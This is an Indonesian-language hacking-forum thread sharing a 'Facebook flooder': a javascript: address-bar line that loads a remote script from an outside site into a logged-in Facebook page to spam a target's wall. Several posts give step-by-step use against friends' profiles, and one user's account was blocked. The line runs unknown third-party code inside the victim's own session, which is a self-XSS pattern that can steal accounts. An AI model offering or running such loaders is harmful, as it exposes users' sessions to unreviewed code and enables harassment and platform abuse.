Thread subject: Explore Your Brain :: Facebook Flooder

Posted by 9ilan9 on 01-01-2011 22:33
#1

ni script buat ng'flood wall orang.
kaka tinggal copas aja script ini ke addres bar target.
Code
javascript:(a = (b = document).createElement("script")).src = "//xenonime.com/tools/wew.js", b.body.appendChild(a); void(0);



trus enter.
nahh nanti bakalan ada perintah" masukan jumlah flood trus masukan pesan yang akan dikirim.
abis ntu .. refresh deh.

Thanks to : Xroot and XenoNime HN-community

Posted by punkeinstein on 01-01-2011 23:38
#2

parah :D .. .. saya kira flood itu apaan :D...

Posted by mvmt4z on 03-01-2011 01:39
#3

Aman g nih ...... soalnye ane g paham dgn yg namanya javascript bro ntar malah nyuri2 sesuatu dari akun fb kita :sorry

Btw kl ane liat sourcenya itu me-load file javascript wew.js yang sdh di upload di halaman xononime.com/tools/wew.js
Makanya ane nanya dulu apakah ini aman ..... sukur2 ada yg paham dgn javascript bisa jelasin maksud dr script di atas .... hehehe no offense bro ya ....

p):

Posted by 9ilan9 on 04-01-2011 17:56
#4

ane udah nyoba kaka.
Fb ane ga k'napa" ko .. malah Fb target yang jadi sumpek tuh wallnya .. ahahaha

Posted by ardi182 on 04-01-2011 22:34
#5

bisa di SS bos...
hehe

:?clp?

Posted by Jalool on 05-01-2011 02:55
#6

eh, cara pakeknya tuh gimana sih?
aku masih bingung! :hlp:noob

Posted by panjul on 05-01-2011 06:18
#7

BISA LEBIH JELAS GAK BROW...YG DI EDIT BGIAN MANA???

Edited by panjul on 05-01-2011 06:20

Posted by shideq on 06-01-2011 15:47
#8

ahhh prah fb w d blokir nieh slama beberapa jam..
mci ad yg lbih kejam lgii g..:?kil?

Posted by EVA-00 on 06-01-2011 22:29
#9

yang masih pada bingung cara pakenya gw kasih clue niy.

1. buka profile fb temen lu (jgn punya sendiri)

2. setelah di buka, copy paste ke addresbar trus enter & ikutin petunjuknya.

3. resiko tanggung sendiri :lol

Edited by EVA-00 on 06-01-2011 22:30

Posted by SUDO-CRACK on 07-01-2011 07:34
#10

uuhh cellemm. ga belani nyoba ah.. brrrr :sorry

Posted by badonx on 07-01-2011 21:40
#11

grrrrrrrrrrrrrrrr mantaaaavvv :gj

Posted by infinity258 on 07-01-2011 21:40
#12

sori dobel :?doa?

wah ternyata bener benr flooding :D

tapi max nya cuma 10 yak ???

masa aq ketik 100 cuma 10 yg keluar :?huh?

Posted by 9ilan9 on 08-01-2011 04:24
#13

nih niih saya kasih SS'y .. masih work.
ane abis nyoba barusan.
pertama tu buka fb target .
trus yang dilingkarin ntu kaka apus.

gambar.hacker-cisadane.org/images/97899633241010078965.jpg

Abis ntu copas scriptnya.
masukin deh ke addres bar

gambar.hacker-cisadane.org/images/92693824657122564726.jpg

trus enter.
nahh ntr muncul kata kata .. masukan jumlah pesan yang anda inginkan
mav untuk yang bagian ini saya lupa SS .. saya maen masukin jumlah pesannya ajja tuh hehhe.
untuk percobaan ini saya hanya masukan sejumlah 20 biji.
tekan OK.
seabis ntu nanti muncul seperti yang kaya gambar diatas.
Tekan OK lagi.

nahh tunggu deh sebentar .. kalo udah kita" sampe 5 menit,kaka refresh.
Ini Untuk hasil
gambar.hacker-cisadane.org/images/26055067050674097636.jpg

Posted by alpheen on 12-01-2011 03:09
#14

wakakak, matap, ketinggalan ane

Posted by 9ilan9 on 13-01-2011 02:37
#15

kaka .. kalo ada yang tau cara ng'flood like gtu .. kasih tau ane ya